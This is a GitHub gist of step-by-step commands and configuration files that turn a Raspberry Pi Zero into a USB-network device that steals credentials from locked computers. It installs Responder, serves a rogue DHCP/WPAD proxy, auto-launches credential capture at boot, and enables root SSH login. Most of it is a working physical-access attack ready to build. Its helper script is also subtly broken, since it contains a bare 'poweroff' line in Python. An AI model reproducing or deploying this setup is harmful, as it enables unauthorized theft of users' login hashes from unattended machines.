Skip to content

Instantly share code, notes, and snippets.

@milo2012
Last active December 1, 2021 11:58
Show Gist options
  • Save milo2012/1c638b19b61c1338e21bad23705ff8fb to your computer and use it in GitHub Desktop.
Save milo2012/1c638b19b61c1338e21bad23705ff8fb to your computer and use it in GitHub Desktop.
Snagging creds from locked machines (for Raspberry Pi Zero)
##An update to Snagging Creds From Locked Machines from https://room362.com/post/2016/snagging-creds-from-locked-machines/.
##Installation on Rasberry Pi Zero
##Download Raspbian Jessie Lite from https://www.raspberrypi.org/downloads/raspbian/
##Use Pi Filler and write image to MicroSD
##Follow Step 1) in https://learn.adafruit.com/turning-your-raspberry-pi-zero-into-a-usb-gadget/ethernet-gadget to let the Raspberry Pi Zero device emulates as a USB NIC
$ cd /pentest
$ apt-get install -y python git python-pip python-dev screen sqlite3
$ pip install pycrypto
$ git clone https://github.com/lgandx/Responder
$ apt-get install inotify-tools
$ aptitude -y install isc-dhcp-server
##Change PermitRootLogin value to 'Yes'
$ nano /etc/ssh/sshd_config
PermitRootLogin yes
$ nano /etc/network/interfaces
auto usb0
allow-hotplug usb0
iface usb0 inet static
address 192.168.2.201
netmask 255.255.255.0
gateway 192.168.2.1
$ nano /etc/dhcp/dhcpd.conf
ddns-update-style none;
option domain-name "domain.local";
option domain-name-servers 192.168.2.201;
default-lease-time 60;
max-lease-time 72;
authoritative;
log-facility local7;
option local-proxy-config code 252 = text;
subnet 192.168.2.0 netmask 255.255.255.0 {
range 192.168.2.1 192.168.2.2;
option routers 192.168.2.201;
option local-proxy-config "http://192.168.2.201/wpad.dat";
}
$ /etc/init.d/dhcpcd restart
$ nano /etc/rc.local
#!/bin/sh -e
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases
/usr/sbin/dhcpd
/usr/bin/screen -dmS responder bash -c 'cd /pentest/Responder/; python Responder.py -I usb0 -f -w -r -d -F -P'
/usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /pentest/Responder/Responder.db; do poweroff; done'
#/usr/bin/screen -dmS checkStatus bash -c 'cd /pentest; python checkStatus.py'
exit 0
$ nano /root/.screenrc
# Logging
deflog on
logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log
$ nano /pentest/checkStatus.py
import os
import glob
import time
while True:
fileList=glob.glob('/pentest/Responder/logs/*.txt')
if len(fileList)>0:
cmd = "echo 1 | sudo tee /sys/class/leds/led0/brightness"
os.system(cmd)
poweroff
else:
cmd = "echo 0 | sudo tee /sys/class/leds/led0/brightness"
os.system(cmd)
time.sleep(1)
##Plug the Raspberry Pi Zero device to the laptop using the Micro USB cable.
##Responder will attempt to capture the credentials
##The LED on Raspberry Pi turns off when credentials are captured.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment